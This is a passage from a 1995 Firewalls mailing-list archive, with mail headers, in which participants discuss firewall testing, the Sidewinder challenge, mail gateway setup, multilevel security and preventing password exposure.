hardware package that will address >the issue of "big foot in mouth disease." > I wouldn't be to quick to appoligize, I have the same concerns and there were not soothed by watching how you got jumped on for expressing a reasonable concern. Although, it sounds reasonable to say that they only ship intimate details about your system (and those your connected to) after asking if its ok, I don't think it unreasonable to expect that one or two departmental users on a 4000 user network may go out and by their own copies and not be sophisticated enough to understand the corporate ramification of automating such a response. Bill Bill Husler bhusler@community.net From firewalls-owner Thu Aug 3 11:51:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03631 for firewalls-outgoing; Thu, 3 Aug 1995 09:50:57 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01968 for ; Thu, 3 Aug 1995 09:36:19 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smax00301; Thu Aug 3 09:34:38 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id GAA20908; Thu, 3 Aug 1995 06:21:08 -0700 Received: from unknown(199.86.32.7) by mycroft via smap (V1.3mjr) id sma020897; Thu Aug 3 06:20:52 1995 Received: from [199.86.33.21] by skypoint.com with smtp (Smail3.1.28.1 #6) id m0se0F0-0005CvC; Thu, 3 Aug 95 08:23 CDT X-Sender: ray@skypoint.com (Unverified) Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 3 Aug 1995 08:25:54 -0500 To: firewalls@greatcircle.com From: kaplan@bpa.arizona.edu (Ray Kaplan) Subject: Re: Sidewinder challenge, Re: multilevel security in firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Drat Just got some good discussion going and life interveines to slow me down for a few days. Thanks for ALL the mail and discussions, folks. 40+ messages is quite a shock after living in the vacuum of being one of the only people asking these kinda questions so often, I love it. I'm working my way through it, but don't want to loose the focus or give anyone the impression that I have ignored their important points. As a practical matter, I'm as busy as anyone (me thinks the world has gotten pretty crazy of late). The current plan is to pick this all up again in a few days and fix my inability to deal with it by catalogueing and organizing it all in the process of wading through the pile of unread mail. I can't show up at DEFCON until after the Sidewinder demo has folded up. Anyone going to go out there for it? If so, I'd like to work with you to summarize it and make this summary available along with a summary of the many great, cogent discussion that has taken place here - as part of a larger effort to stop the current electronic madness in my life. Meantime, hope to beg the list's indulgence and *beg* for your to share your pet ways to keep such threads alive and organized without inventing a fourth shift for myself every day ;) RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. From firewalls-owner Thu Aug 3 12:01:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03637 for firewalls-outgoing; Thu, 3 Aug 1995 09:51:08 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA00697 for ; Thu, 3 Aug 1995 09:30:46 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smata0301; Thu Aug 3 09:29:51 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id JAA22928; Thu, 3 Aug 1995 09:00:50 -0700 Received: from mercury.sun.com(192.9.25.1) by mycroft via smap (V1.3mjr) id sma022916; Thu Aug 3 09:00:29 1995 Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id IAA07792; Thu, 3 Aug 1995 08:59:49 -0700 Received: from olympics.Eng.Sun.COM by Eng.Sun.COM (5.x/SMI-5.3) id AA12525; Thu, 3 Aug 1995 08:57:58 -0700 Received: by olympics.Eng.Sun.COM (5.1 03/21/95 /CRAY-5.1) id AA17195; Thu, 3 Aug 95 08:52:48 PDT Date: Thu, 3 Aug 95 08:52:48 PDT From: Brad.Powell@Eng.Sun.COM ( Brad Powell SunNetworks) Message-Id: <9508031552.AA17195@olympics.Eng.Sun.COM> To: mjr@iwi.com, craiga@Ipsilon.COM Subject: Re: connectathon: BOGUS // testing methodologies Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From firewalls-owner@GreatCircle.COM Wed Aug 2 16:49:58 1995 >From: Craig Anderson >My purpose in suggesting a Connectathon-like event was to try and >remove some of the FUD from this industry (but then, that's what >security is all about, right? :-). Nope. There are enough real threats without introducing FUD. > FUD hurts everyone. It's too >easy for anyone to sell FUD and do nothing for the customer. agreed. But the the media seems to just love to publish it :-) :-\ > The >industry must have some form of accountability. Some measure of >quality and objectivity. Then what your really looking for is a Underwriters Labratories (UL) approval? Or at least a OSHA standard? or something?????? This (imho) is why many buyers require Orange Book security. Not because Orange Book is correct for buisness BUT because there is NO other reasonable Standard for Security. > Otherwise, how many of you consultants >want to start paying for malpractice insurance? This is why contracts are negotiated by Lawyers instead of just a handshake :-( > >Maybe the firewall vendor audits and warrantees the installation >of it's firewall, or leases the firewall to the customer and >provides operational support for it (or through the ISP). Yes most do. > >Come on guys, you can't sell FUD forever. I don't need to and neither do many others. > How do I, as a customer, >know what I'm paying for? There should have been a requirements phase where *you* told the vendor/consultant what you wanted, and they documented what *you* said and they should be using that as a list of deliverables and quoting you a price based on *your* requirements. Don't buy off (pay them) until those requirements are filled and documented. If you don't get a finalized document that details *all* the work completed and documents *all* the changes made and the reason for each, then complain!!!!!! Its your dollars being spent, demand to get your money's worth. Also a TOI (transfer of information) should be one of your requirements. Make sure its listed in your requirements. You should never walk away not knowing what you paid for. If you do then I would say you _did_ get swindled even if the work was done correctly. A good consultant group is supposed to solve your problems and let you sleep at night not keep you up wondering. > >What do you say for yourselves vendors? thats about it. :-) > >Craig Anderson > > >======================================================================= Brad Powell : brad.powell@Sun.COM Sr. Network Security Consultant SunNetworks, Sun Microsystems Inc. ======================================================================= The views expressed are those of the author and may not reflect the views of Sun Microsystems Inc. ======================================================================= From firewalls-owner Thu Aug 3 12:10:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03678 for firewalls-outgoing; Thu, 3 Aug 1995 09:52:26 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01233 for ; Thu, 3 Aug 1995 09:32:57 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smanc0301; Thu Aug 3 09:31:48 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id HAA22123; Thu, 3 Aug 1995 07:49:15 -0700 Received: from zippy.radian.com(129.160.16.4) by mycroft via smap (V1.3mjr) id sma022117; Thu Aug 3 07:49:02 1995 Received: from zippy.radian.com (zippy.radian.com [129.160.16.4]) by zippy.radian.com (8.6.5/8.6.5) with SMTP id JAA01335; Thu, 3 Aug 1995 09:47:53 -0500 Date: Thu, 3 Aug 1995 09:47:52 -0500 (CDT) From: Dale Whiteaker-Lewis To: dannyc@gmap.leeds.ac.uk cc: firewalls@greatcircle.com Subject: Re: an alternative for our email Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Well, first off, I am a reluctant baby-sitter for the cc:Mail SMTPLINK product at our company. The product seems to have really stunk, up to version 2.1. I have tried to set this up to be amenable to safe mailing, I hope I've done a good job, and would appreciate hearing if I've missed something obvious. After typing the message below, I can already see one small problem. It's amazing what even the anticipation of peer review can do to sharpen your senses! The way we have it set up is: -------------- | Cisco | -------------- | | ----------- +---| Solaris | | | box | | ----------- | ---------------- | SGI running | | packet screen | ---------------- | ---------- | -------------- | SMTPLINK |----------+-----------------| HP mailhost | ---------- -------------- The Solaris box (in the "lobby" or DMZ) has no local mail users, so it can run Sendmail as a non-root user and forward it on to the "HP mailhost" through a hole punched in the SGI packet screen. On the HP, we have 8.6.something Sendmail with a mailertable entry that forwards all mail of the form @pc.radian.com to the SMTPLINK PC and delivers all @radian.com mail locally. As an added treat, the mail alias file on the HP has 2000+ entries for our employees so that mail sent to Joe_Blow@radian.com gets aliased to Joe_Blow@pc.radian.com and delivered to SMTPLINK. The key feature of SMTPLINK that we use to accomplish all this is "Smart Addressing". That is if you relay a message to SMTPLINK with a destination of Joe_Blow, it first looks in the cc:Mail directory for a "Joe Blow", then a "Blow, Joe" (which is the way we define people). That way, I don't have to manually maintain the aliases file to translate SMTP to cc:Mail addresses. One final neat trick you can do is, if you define a SMTP user as the administrator in the SMTPLINK setup, you can set propogation so that a user on the SMTP side of the gateway gets UUENCODED versions of all the directory updates. We take those, run them through a sh/awk script and automatically update the alias file. Pretty cool, huh? :-) Of course, I've been mucking with this thing for several years, and just now have it automated. It fails way to often, and used to take up way to much of my time. If you're interested in the sh/awk scripts that do the update, let me know. |~~~~~\ /~~\ |~~~~~\ |~| /~~\ |~\_|~| Dale Whiteaker-Lewis, Sys Admin | ~ / / /\ \ | [~_] || | / /\ \ | \ \ | Dale_Whiteaker-Lewis@radian.com |_|~|_\/_|~~|_\|_____/ |_|/_|~~|_\|_|\__| BOX 201088 Austin, TX 78720 C O R P O R A T I O N All my opinions are not Radian's From firewalls-owner Thu Aug 3 12:27:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03722 for firewalls-outgoing; Thu, 3 Aug 1995 09:53:00 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA02102 for ; Thu, 3 Aug 1995 09:36:39 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smacb0301; Thu Aug 3 09:35:14 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id GAA20922; Thu, 3 Aug 1995 06:21:45 -0700 Received: from unknown(199.86.32.7) by mycroft via smap (V1.3mjr) id sma020901; Thu Aug 3 06:21:07 1995 Received: from [199.86.33.21] by skypoint.com with smtp (Smail3.1.28.1 #6) id m0se0EJ-0005CrC; Thu, 3 Aug 95 08:22 CDT X-Sender: ray@skypoint.com (Unverified) Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 3 Aug 1995 08:25:10 -0500 To: firewalls@greatcircle.com From: kaplan@bpa.arizona.edu (Ray Kaplan) Subject: Re: Using miltilevel systems for firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bob Writes: >> ... secure channels...seem to require trusted systems >Hummmmm. Ok. Have any other ways to do this besides a trusted system? >> So, I propose that anyone who is serious about mapping their infrastrucutre >> across a network (especially a public network like the Internet) needs to >> use multilevel systems - unless they only have one classification of data >> that they don't care about. I've never seen such an organization - anyone >> else? >Well, if you do government work you'll find them everywhere. I'm sure, and they certainly don;t have the exclusive lease on this turf >>... What I commony hear: "Security? Yeah, >> 'gimmie a little 'o that, will ya?" >One of the problems is cultural. Trying to get folks in the commercial >side to now come up to speed on information security, where it has >never been an issue before is difficult. Hell those who have been >dealing with it in the USG for years can't get it right half the time. Indeed, however, there *are* commercial organizations who do take it seriously. The real question is WHY it usually takes a nasty incidident (or the threat of one) to wake 'em up. My answer - Grace Hopper used to say that the only way we (as a civilization) know how to change is through crisis. Was she right? If so, perhaps I should raise my rates and specialize in incident handling ;) >> It just looks like a gigantic connect-o-ramma out here - or, is it just me? >NSA, DISA, NIST and others have been struggling with this MLS business >for years. They have been able to prove it out quite nicely in the >lab. But getting the concept to work in a manner that the user >community can easily deal with is a whole different story. NSA has >invested hundreds of millions in a program called MISSI (Multi-level >Information Systems Security Intitative) designed to provide protection >of both USG classified and unclassified but sensitive information of >differing classification levels transversing the same paths. Industry >technologists have essentially solved the technical problems. What's >left are mainly policy, standardization and rice bowl issues which for >government will take up whole careers. Great summary and perspective. So, in the meantime - we on the private sectorl side simply have to wait for another decade of experience with confidentiality and integrity questions as our privacy and infrastructures are undermined? Will it take legislation that holds commercial enterprise (and us personally) accountable for protecting information to speed the process? If so, does this mean that commercial systems will have to be licensed (e.g., auto emission control seems to have taken laws to enforce...)? Every time I think about this, I hear the faint sounds of the thin ice under my feet cracking ;) Perhaps I should give this career over for one that has better prospects for making a difference ;) Well, at least I am trying to help, so I guess I can go to my grave knowing that I didn't give up? Wonder how a headstone inscription - "Labored tirelessly in frustration" will stack up with the others in the graveyard? ;) >Commercial industry on the otherhand are already solving these >problems. Companies that are in the business of developing hardware >and software security products are at work developing the very >architectures you refer to above. Trust me, I own stock in a couple of >them, I've seen thealpha modeles and they work. It won't be long. Great! Also, just having come from "authentication land" (CyberSAFE - Kerberos), I - too - have some hope. However, things seem to be a big enough mess that market penetration to the extent that security is "built in" as a commodity item is a long time away - maybe evnen a lifetime? Do you know of any commercial enterprises that have awaken to this technology past the point of reacting to incidents? I know of few. RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. From firewalls-owner Thu Aug 3 13:27:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03780 for firewalls-outgoing; Thu, 3 Aug 1995 09:55:18 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA02103 for ; Thu, 3 Aug 1995 09:36:40 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smadb0301; Thu Aug 3 09:35:15 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id GAA20946; Thu, 3 Aug 1995 06:23:08 -0700 Received: from unknown(199.86.32.7) by mycroft via smap (V1.3mjr) id sma020936; Thu Aug 3 06:22:47 1995 Received: from [199.86.33.21] by skypoint.com with smtp (Smail3.1.28.1 #6) id m0se0Eq-0005CwC; Thu, 3 Aug 95 08:23 CDT X-Sender: ray@skypoint.com (Unverified) Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 3 Aug 1995 08:25:43 -0500 To: Firewalls@GreatCircle.COM From: kaplan@bpa.arizona.edu (Ray Kaplan) Subject: Re: Sidewinder Challenge Cc: padgett@tccslr.dnet.mmc.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Padgett writes: >mjr rites: >> Rather than see "take a blindfolded shot at the system" >>firewalls tests, I'd rather see: "here is a detail of our design, >>take it and study the exact configuration you will be attacking >>and come back in a week with testing tools" approach. Anything >>else is security through obscurity, and hopefully we've learned >>that that's not very good. >I agree with Marcus with the additional comment: periodically I get requests >from people to "try to break into system xxxx and see if it is secure". >I always refuse (maybe why haven't not been promoted in ten years), not >because there are any doubts that it can be done, but because Things May >Get Broken in the process. This parallels my experience and I agree. So, how do we move the status quo to our shared point of view? It seems that if we take some of these things one, small step at a time, we can build a significant collection of war stories to support our possition that everyone can use. ... Or, do we have to wait until one of us has the time / resources to do a book on the subject? Anyone know of good stories about attack efforts that went arwy? I have a few that I'll share as I have time. >The right way is to first studdy the system in question off line: the >network configuration, the ACLs, the design rules. Once a good understanding >of the concept is made, then study the policies involved (what ? you don't >have any ? Then what am I testing ? - always have a sample set when you say >this BTW). > >Next examine the perimeter for "leaks" - conduct a modem sweep. Call the >phone company and ask about leased lines. Sweep the network for unknown >nodes (have *never* seen a paper list that was up-to-date - have even found >entire unlisted subnets). > >At this point you should not have to do any penetration testing, you should >be able to predict all vulnerabilities. Of course you are going to need >to demonstrate them since no-one will believe you but there should not be >any element of doubt, you should know. Agreed. Now, you can see why I think we need an "Attack-a-thon" where people can see these first-order principals demonstrated *before* they bankrupt people like meand Marcus by jerking our chains for "system break-in quote RFP responses" and make people like you (who are credentialed in a formal manner) wonder why you aren't as successful as those who go do attacks? Seems that such "please come attack my system to prove that it is secure" only comes up with one, stupid and obvious problem to report which the client's management poo poos as noise. One attempt to change this status quo is reportedly being made at the DEFCON hacker conference this weekend in Vegas. Several interesting sessions seem to be focusing on explaining to "new" hackers that they need to clean up their acts and focus on more professional approaches. The reason that I bring this up, is that it seems that maybe one of my recurrent fantacies may be a reality soon. I have always wanted to do an attack on a commercial organization where-in I'd materially affect their business (maybe even improve it ;) ) and then use this possition to change the lay of the land. For instance, wouldn;t it be great if you walked into a board room and told thte CEO to get out of your chair since you now owned the place? Although I agree with your earlier point about: >Things May >Get Broken in the process. Im my own experience, a stock exchange once called for an attack on their firewall. I took them seriously and went to do my homework. I assembled critical mass (people, knowledge, and tools) to affect an attack goal: actually trade and move some money around. I'm pretty convinced that a dedicated attack that is properly designed, well funded, and well executed *WILL* succeed. As an example, during the L.A. riots, a friend commented that a well disiplined team of specialized criminals could have cleaned up amid the pandamonium by picking out selected jewlery stores and bank branches for professional heists. If nothing else, it seems that the frailty of most systems guarentees the success of a dedicated attack. The prospective client was horrified that I actually proposed to slip in and out during the heat of the middle of the trading day. Their idea was that I'd come on a Sunday and piddle with things when they were slow and they were affraid that they'd all loose their jobs *if* I succeeded. They weren't so much worried about my mucking up their production systems, but were more worried about this than seemed justified given that I proposed a surgical strike. >However, while the Sidewinder challenge is somewhat flawed technically, it >is good marketing particularly when the target is people with money who know >little/nothing about firewalls. You could have the best product in the world >but it will fail in the marketplace without effective marketing and I would >rather see the sales go to a product with potential like Sidewinder from an >in-depth company than to a one-trick-pony with a glossy GUI as happened in >the anti-virus market. No question there! One question that remains is how to keep this playing field level. >But then what would I know, am not particularly sucessful. Well, that depends on how you measure success. I - for one - have benifited greatly from your experience. (More kudos when I can take the time to say them right.) Meantime, how to collect and distill some of this for practical use in helping solve firewall (and general infrastructure security) problems for us all? I keep coming back to the idea that we need a hack-a-thon that is properly designed, executed, and reported. Or, am I just going to end up looking at another dusty journal of experience on a library shelf? While there is a good argument to be made for me to just go do this, I wonder if anyone would even take note. 'course, it may be that all we need is a good marketing / PR type to make this pretty enough to catch people's fancy and make it a dooable do? RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. From firewalls-owner Thu Aug 3 13:37:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA12169 for firewalls-outgoing; Thu, 3 Aug 1995 12:22:30 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA12154 for ; Thu, 3 Aug 1995 12:22:27 -0700 Received: from unknown(192.85.154.76) by miles via smap (V1.3) id sma012148; Thu Aug 3 12:21:46 1995 Received: by egate1.eds.com (hello) id PAA21607; Thu, 3 Aug 1995 15:20:35 -0400 Received: by igate1.eds.com (hello) id PAA24308; Thu, 3 Aug 1995 15:20:34 -0400 Received: from kocrsw26.delcoelect.com (kocrsw26.delcoelect.com [144.250.106.32]) by kocrsv04 (8.6.12/8.6.12) with ESMTP id OAA19171 for ; Thu, 3 Aug 1995 14:20:34 -0500 Received: (swlodin@localhost) by kocrsw26.delcoelect.com (8.6.12/8.6.12) id OAA16770 for Firewalls@greatcircle.com; Thu, 3 Aug 1995 14:20:33 -0500 From: "Steve Lodin" Message-Id: <9508031420.ZM16768@kocrsw26.delcoelect.com> Date: Thu, 3 Aug 1995 14:20:33 -0500 X-Mailer: Z-Mail (3.0.0 15dec93) To: Firewalls@greatcircle.com Subject: Virtual Private Network Enabling Technologies Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, A couple of weeks ago we had a discussion about virtual private networks running on top of the Internet. Does anyone have a list or web site with the enabling technologies to implement VPNs? I'll take any references including white papers and commercial recommendations. Steve -- Steve Lodin (317)451-0479 Delco Electronics Corporation http://www.cs.purdue.edu/people/swlodin Information & Systems Protection Purdue University COAST Project swlodin@delcoelect.com swlodin@cs.purdue.edu From firewalls-owner Thu Aug 3 13:49:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA07413 for firewalls-outgoing; Thu, 3 Aug 1995 10:37:50 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA07324 for ; Thu, 3 Aug 1995 10:37:37 -0700 Received: from edison.eng.auburn.edu(131.204.10.13) by miles via smap (V1.3) id sma007297; Thu Aug 3 10:37:01 1995 Received: from netman.eng.auburn.edu (20663@netman.eng.auburn.edu [131.204.12.24]) by edison.eng.auburn.edu (8.6.12/8.6.4) with ESMTP id MAA05122; Thu, 3 Aug 1995 12:35:41 -0500 From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id MAA27004; Thu, 3 Aug 1995 12:35:39 -0500 Date: Thu, 3 Aug 1995 12:35:39 -0500 Subject: Re: /etc/services on Solaris To: dannyc@gmap.leeds.ac.uk Cc: firewalls@greatcircle.com Message-Id: In-Reply-To: <3565.9508030917@gmap.leeds.ac.uk> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Thanks for various comments regarding cc:Mail etc. If anyone else has opinions >I look forward to hearing them. > >I'm going through my /etc/services file again (Solaris 2.3). The FW+Inet >Security bible makes a load of recommendations about what to allow - >however it doesn't consider all the entries in the default solaris services >file, viz > >name 42/udp nameserver >rje 77/tcp ... stuff deleted.... > >I'm inclined to take all of these out. I'm slighly wary as to whether I'm >going to shoot myself in the foot by doing so however, as I don't really >know what half of these do! We don't have any need for X.400 mail; I'm >not running a printer or NFS from my firewall either. And needless to >say I'm not running Ingres on it!!! Anyone comment upon whether I should >keep any of these ? > >Thanks all again, >Danny > > > There's no need to take them out. Taking them out of /etc/services doesn't mean anything other than you can't resolve a name to port number pair. In my opinion, you would be doing yourself a disservice if it ever became necessary to figure out what a service was when you were being probed on that port. Instead, why not set up something that listens on these services ports and reports the access if you know that no legitimate traffic could possibly come on these ports? -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu "Real programmers use cat > file.as" From firewalls-owner Thu Aug 3 14:00:57 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA14935 for firewalls-outgoing; Thu, 3 Aug 1995 13:40:47 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA14900 for ; Thu, 3 Aug 1995 13:40:41 -0700 Received: from puddytat.intecom.com(192.246.135.16) by miles via smap (V1.3) id sma014851; Thu Aug 3 13:39:46 1995 Received: (from mbrennen@localhost) by puddytat.intecom.com (8.6.12/8.6.9) id PAA01875; Thu, 3 Aug 1995 15:36:58 -0500 Date: Thu, 3 Aug 1995 15:36:58 -0500 (CDT) From: Michael Brennen To: Darren Reed cc: Firewalls Mailing List Subject: Re: preventing password accidents. In-Reply-To: <199508031550.IAA22775@mycroft.GreatCircle.COM> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 4 Aug 1995, Darren Reed wrote: > What I'd like to propose is that firewalls and other systems which > require the use of reuseable passwords take preventative measures, > to stop a potentially harmful/critical password being entered across > an insecure medium. ie if it sees the username "root" given to the > "login:" prompt, it drops the connection immeadiately with no > "Password:" prompt sent back. And it does the same for anyone who has > a trusted account (ie group wheel, etc). You may wish to alter this > policy for ssh/STEL/deslogin accesses, as appropriate. > If something already has this behaviour, please point me at it, but as > far as I am aware, nothing will stop you entering a password if you > have already entered a username, especially if it is valid. A properly configured S/Key system will prevent this. The trick is the /etc/skey.access file to require S/Key from non-local sites. I have a particular login that does not require S/Key locally, but will not accept the reusable password remotely. S/Key is required for remote login on that ID. Nothing prevents me from *trying* to enter the password from a remote site and having it sniffed, but it won't be accepted. A short between the headphones is a different problem entirely. The combination of tcp_wrappers, S/Key and logdaemon is a rather configurable way to tighten access. The logdaemon package in addition allows configurable use of login names. I have root completely disabled from all but the local console, for example. Groups can be controlled in similar ways. Comments welcome if I have missed something... Michael Brennen From firewalls-owner Thu Aug 3 14:10:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04284 for firewalls-outgoing; Thu, 3 Aug 1995 10:00:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04252 for ; Thu, 3 Aug 1995 10:00:28 -0700 Received: from relay4.uu.net(192.48.96.14) by miles via smap (V1.3) id sma004186; Thu Aug 3 10:00:07 1995 Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzbff18577; Thu, 3 Aug 1995 12:58:52 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA05002; Thu, 3 Aug 95 12:52:08 EDT Date: Thu, 3 Aug 1995 12:52:07 -0400 (EDT) From: Sick Puppy Subject: Question on Firewall 1 failures To: firewalls@GreatCircle.COM Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 1. Some time ago there were postings here about Sun's Firewall-1 failing to function as a firewall in some conditions. Is it still having problems? 2. Does anyone know how many government sites are using Sun's Firewall 1 (how many sites, not which sites). 3. I would especially like to hear from anyone who has a Firewall-1 horror story. Preferably by e-mail, as nasty hackerz might be reading the list. Any mail I receive on the subject will not be passed on to anyone else. Sick Puppy, the Cat_Eating_Dawg Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter From firewalls-owner Thu Aug 3 14:14:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA11143 for firewalls-outgoing; Thu, 3 Aug 1995 11:54:28 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA11112 for ; Thu, 3 Aug 1995 11:54:23 -0700 Received: from ian.aztec.co.za(196.3.251.162) by miles via smap (V1.3) id sma011099; Thu Aug 3 11:54:07 1995 Received: by ian.oms.co.za (Smail3.1.29.1 #4) id m0se6Ih-000MeDC; Thu, 3 Aug 95 19:51 GMT Message-Id: From: Ian Cooper Subject: Re: NetSp wins Trust Award To: firewalls@greatcircle.com Date: Thu, 3 Aug 1995 19:51:26 +0000 (GMT) In-Reply-To: from "Frank K. Senter" at Aug 3, 95 10:38:10 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1174 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > A consultant told me that IBM's NetSP SNG is a "circuit gateway" type of > firewall, as compared to packet filters or proxy gateways. Can someone > explain? Also, I think the consultant may have confused the two "NetSP" > products. Any confusion over these separate applications is entirely > IBM's fault... NetSP SNG uses a SOCKS proxy for outgoing TCP connections. Since this proxies at the TCP level (as opposed to a telnet proxy, which does its work at the application protocol level), it is a circuit level relayer. It is essentially establishing a virtual circuit between source and destination hosts. As for incoming connections, as far as I know, NetSP SNG uses various application level proxies. It's really no different from any of the other firewalls out there - certainly no ground-breaking features. > > Frank Senter > Senior Information Specialist > Missouri Highway and Transportation Department > P.O. Box 270 > Jefferson City MO 65102 > > -- Ian Cooper Internet: ian@oms.co.za Open Mind Solutions Tel: +27 083 253-9865 Open Systems and Network Specialists From firewalls-owner Thu Aug 3 14:15:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11529 for firewalls-outgoing; Thu, 3 Aug 1995 12:04:30 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11491 for ; Thu, 3 Aug 1995 12:04:25 -0700 Received: from simtel.coast.net(205.149.128.6) by miles via smap (V1.3) id sma011467; Thu Aug 3 12:03:38 1995 Received: by simtel.Coast.NET (Smail3.1.28.1 #12) id m0se5XH-0000rzC; Thu, 3 Aug 95 15:02 EDT Date: Thu, 3 Aug 1995 15:02:27 -0400 (EDT) To: firewalls@greatcircle.com (Firewalls Mailing List) Subject: preventing password accidents. (fwd) From: "Mike O'Connor" Reply-To: "Mike O'Connor" X-Organization: :noitazinagrO-X Message-Id: <950803150227.mjo@dojo> Content-Type: text Content-Length: 1650 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk :In the many attempts to stop passwords being sent over the clear when :dialing from remote locations, none of them actually do anything to stop :it being typed. God knows I've done it on occasion... : :What I'd like to propose is that firewalls and other systems which :require the use of reuseable passwords take preventative measures, :to stop a potentially harmful/critical password being entered across :an insecure medium. ie if it sees the username "root" given to the :"login:" prompt, it drops the connection immeadiately with no :"Password:" prompt sent back. And it does the same for anyone who has :a trusted account (ie group wheel, etc). You may wish to alter this :policy for ssh/STEL/deslogin accesses, as appropriate. There was a nice little security problem with Ultrix of old where under certain conditions, it would issue a login: prompt twice. Lots of people typed their password after their login was accepted, out of habit, and it'd end up visible on the screen, like so: login: root login: root-password Even if you dropped the connection, I still think you'd have a number of people do that -- I've seen one root user do just that with the Ultrix bug. Instead of sending their password along the wire, they might well emit it in front of the wrong people. Not a big deal with something like skey, to be sure, but still, not something you want to see happen. ...Mike -- Michael J. O'Connor Internet: mjo@dojo.mi.org InterNIC WHOIS: MJO http://www.coast.net/~mjo "...and it rained -- like a slow divorce..." -Robyn Hitchcock From firewalls-owner Thu Aug 3 14:46:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA15981 for firewalls-outgoing; Thu, 3 Aug 1995 14:06:47 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA15955 for ; Thu, 3 Aug 1995 14:06:43 -0700 Received: from gateway.petro-canada.ca(156.44.254.2) by miles via smap (V1.3) id sma015949; Thu Aug 3 14:06:35 1995 Received: from LANCAL by GATEWAY.PETRO-CANADA.CA via Pony Express SMTP with TCP (v9.5.0-moe002); Thu, 3 Aug 95 15:05:18 MDT Received: from smtpgw.pccw.petro-canada.ca by LANCAL via Pony Express SMTP with 